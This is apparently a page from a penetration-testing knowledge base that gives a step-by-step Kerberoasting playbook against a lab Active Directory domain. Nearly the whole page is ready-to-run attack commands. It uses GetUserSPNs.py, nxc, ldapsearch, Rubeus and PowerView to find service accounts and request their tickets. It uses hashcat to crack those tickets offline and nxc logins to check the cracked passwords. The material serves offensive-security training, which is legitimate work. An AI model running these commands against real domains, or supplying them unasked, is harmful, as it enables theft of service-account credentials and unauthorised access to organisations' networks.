Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 03. Kerberos / Roasting / Kerberoasting

Attack

Kerberoasting targets accounts with SPNs. We authenticate as any domain user, request service tickets for SPNs, save the returned TGS material, and crack the service account password offline.

Linux list SPNs

GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200
ldapsearch -x -H ldap://10.10.10.200 -D "ootw\\student" -w 'student' -b "DC=ootw,DC=local" "(servicePrincipalName=*)" servicePrincipalName sAMAccountName
nxc ldap 10.10.10.200 -u student -p 'student' --kerberoast kerberoast.hashes

Linux request all roastable SPNs

GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200 -request -outputfile kerberoast.hashes

Linux request one target

GetUserSPNs.py ootw.local/student:'student' -dc-ip 10.10.10.200 -request-user svc_sql -outputfile svc_sql.hash

Linux with alternate authentication

GetUserSPNs.py ootw.local/student -dc-ip 10.10.10.200 -hashes :<NTLM_HASH> -request -outputfile kerberoast.hashes
KRB5CCNAME=/tmp/student.ccache GetUserSPNs.py ootw.local/student -k -dc-ip 10.10.10.200 -request -outputfile kerberoast.hashes
GetUserSPNs.py ootw.local/student -aesKey <HEX_AESKEY> -dc-ip 10.10.10.200 -request -outputfile kerberoast.hashes

Windows enumerate SPNs

setspn.exe -Q */*
Get-DomainUser -SPN | Select-Object samaccountname,serviceprincipalname
Get-NetUser -SPN | ?{ $_.SPN -match 'mssql|cifs|http|ldap' }

Windows roast

Rubeus.exe kerberoast /nowrap /outfile:kerberoast.hashes
Rubeus.exe kerberoast /spn:MSSQLSvc/sql01.ootw.local:1433 /simple /nowrap
Rubeus.exe kerberoast /user:svc_sql /nowrap

LDAP target filter

(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))

Crack RC4

hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt -r rules/best64.rule -O -w 3
hashcat -m 13100 kerberoast.hashes /usr/share/wordlists/rockyou.txt --show

Crack AES

hashcat -m 19600 kerberoast.hashes /usr/share/wordlists/rockyou.txt
hashcat -m 19700 kerberoast.hashes /usr/share/wordlists/rockyou.txt

Validate

nxc smb 10.10.10.200 -u svc_sql -p '<CRACKED_PASSWORD>' -d ootw.local
nxc ldap 10.10.10.200 -u svc_sql -p '<CRACKED_PASSWORD>' -d ootw.local

Notes

Prioritize user-owned service accounts over computer accounts. Computer account passwords are long, random, and rotated by default. Human-managed service accounts are more likely to crack.

RC4 Kerberoast material starts with $krb5tgs$23$. AES material starts with $krb5tgs$17$ or $krb5tgs$18$. Choose the hashcat mode based on that marker.